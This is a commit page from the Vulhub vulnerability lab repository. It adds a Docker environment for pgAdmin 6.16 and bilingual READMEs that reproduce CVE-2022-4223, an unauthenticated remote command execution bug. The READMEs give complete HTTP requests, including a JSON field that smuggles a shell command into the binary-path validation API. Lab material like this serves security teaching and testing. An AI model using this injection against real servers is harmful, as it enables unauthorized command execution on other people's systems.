first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
This commit is contained in:
BIN
pgadmin/CVE-2022-4223/1.png
Normal file
BIN
pgadmin/CVE-2022-4223/1.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 75 KiB |
BIN
pgadmin/CVE-2022-4223/2.png
Normal file
BIN
pgadmin/CVE-2022-4223/2.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 105 KiB |
65
pgadmin/CVE-2022-4223/README.md
Normal file
65
pgadmin/CVE-2022-4223/README.md
Normal file
@@ -0,0 +1,65 @@
|
||||
# pgAdmin <= 6.16 Unauthenticated Remote Command Execution (CVE-2022-4223)
|
||||
|
||||
[中文版本(Chinese version)](README.zh-cn.md)
|
||||
|
||||
pgAdmin is a popular and feature rich Open Source administration and development platform for PostgreSQL, the most advanced Open Source database in the world.
|
||||
|
||||
The pgAdmin server includes an HTTP API that is intended to be used to validate the path a user selects to external PostgreSQL utilities such as pg_dump and pg_restore. The utility is executed by the server to determine what PostgreSQL version it is from. Versions of pgAdmin prior to 6.17 failed to properly secure this API, which could allow an unauthenticated user to execute arbitrary commands on the server.
|
||||
|
||||
References:
|
||||
|
||||
- <https://github.com/pgadmin-org/pgadmin4/commit/799b6d8f7c10e920c9e67c2c18d381d6320ca604>
|
||||
- <https://github.com/pgadmin-org/pgadmin4/commit/461849c2763e680ed2296bb8a753ca7aef546595>
|
||||
- <https://github.com/advisories/GHSA-3v6v-2x6p-32mc>
|
||||
|
||||
## Vulnerable Environment
|
||||
|
||||
Execute following command to start a pgAdmin 6.16 server:
|
||||
|
||||
```
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
After the server is started, browse the `http://your-ip:5050` to see the default login page of pgAdmin.
|
||||
|
||||
## Exploit
|
||||
|
||||
Before exploiting the vulnerability, send the following request to obtain the CSRF token:
|
||||
|
||||
```
|
||||
GET /login HTTP/1.1
|
||||
Host: your-ip:5050
|
||||
Accept: application/json, text/plain, */*
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
|
||||
Connection: close
|
||||
|
||||
|
||||
```
|
||||
|
||||
Get the session id and csrf token from response:
|
||||
|
||||
|
||||
|
||||
Then, fill the following request with the session id and csrf token and send it:
|
||||
|
||||
```
|
||||
POST /misc/validate_binary_path HTTP/1.1
|
||||
Host: your-ip:5050
|
||||
Content-Length: 27
|
||||
X-pgA-CSRFToken: [csrf-token]
|
||||
Accept: application/json, text/plain, */*
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
|
||||
Content-Type: application/json
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
|
||||
Cookie: pga4_session=[session-id]
|
||||
Connection: close
|
||||
|
||||
{"utility_path":"a\";id;#"}
|
||||
```
|
||||
|
||||
As you can see, `id` command has been executed successful:
|
||||
|
||||
|
||||
63
pgadmin/CVE-2022-4223/README.zh-cn.md
Normal file
63
pgadmin/CVE-2022-4223/README.zh-cn.md
Normal file
@@ -0,0 +1,63 @@
|
||||
# pgAdmin <= 6.16 无授权远程命令执行漏洞(CVE-2022-4223)
|
||||
|
||||
pgAdmin是一个著名的PostgreSQL数据库管理平台。
|
||||
|
||||
pgAdmin包含一个HTTP API可以用来让用户选择并验证额外的PostgreSQL套件,比如pg_dump和pg_restore。但在其6.16版本及以前,对于用户传入的路径没有做合适的验证,导致未授权的用户可以在目标服务器上执行任意命令。
|
||||
|
||||
参考链接:
|
||||
|
||||
- <https://github.com/pgadmin-org/pgadmin4/commit/799b6d8f7c10e920c9e67c2c18d381d6320ca604>
|
||||
- <https://github.com/pgadmin-org/pgadmin4/commit/461849c2763e680ed2296bb8a753ca7aef546595>
|
||||
- <https://github.com/advisories/GHSA-3v6v-2x6p-32mc>
|
||||
|
||||
## 漏洞环境
|
||||
|
||||
执行如下命令启动一个pgAdmin 6.16服务器:
|
||||
|
||||
```
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
服务器启动后,访问`http://your-ip:5050`即可查看到pgAdmin默认的登录页面。
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
在复现漏洞前,需要发送如下数据包获取CSRF token:
|
||||
|
||||
```
|
||||
GET /login HTTP/1.1
|
||||
Host: your-ip:5050
|
||||
Accept: application/json, text/plain, */*
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
|
||||
Connection: close
|
||||
|
||||
|
||||
```
|
||||
|
||||
在返回包中拿到一个新的session id和csrf token:
|
||||
|
||||
|
||||
|
||||
然后,将获取到的session id和csrf token填写进下面的数据包并发送:
|
||||
|
||||
```
|
||||
POST /misc/validate_binary_path HTTP/1.1
|
||||
Host: your-ip:5050
|
||||
Content-Length: 27
|
||||
X-pgA-CSRFToken: [csrf-token]
|
||||
Accept: application/json, text/plain, */*
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
|
||||
Content-Type: application/json
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
|
||||
Cookie: pga4_session=[session-id]
|
||||
Connection: close
|
||||
|
||||
{"utility_path":"a\";id;#"}
|
||||
```
|
||||
|
||||
可见,`id`命令已经被成功执行:
|
||||
|
||||
|
||||
6
pgadmin/CVE-2022-4223/docker-compose.yml
Normal file
6
pgadmin/CVE-2022-4223/docker-compose.yml
Normal file
@@ -0,0 +1,6 @@
|
||||
version: '2'
|
||||
services:
|
||||
web:
|
||||
image: vulhub/pgadmin:6.16
|
||||
ports:
|
||||
- "5050:5050"
|
||||
Reference in New Issue
Block a user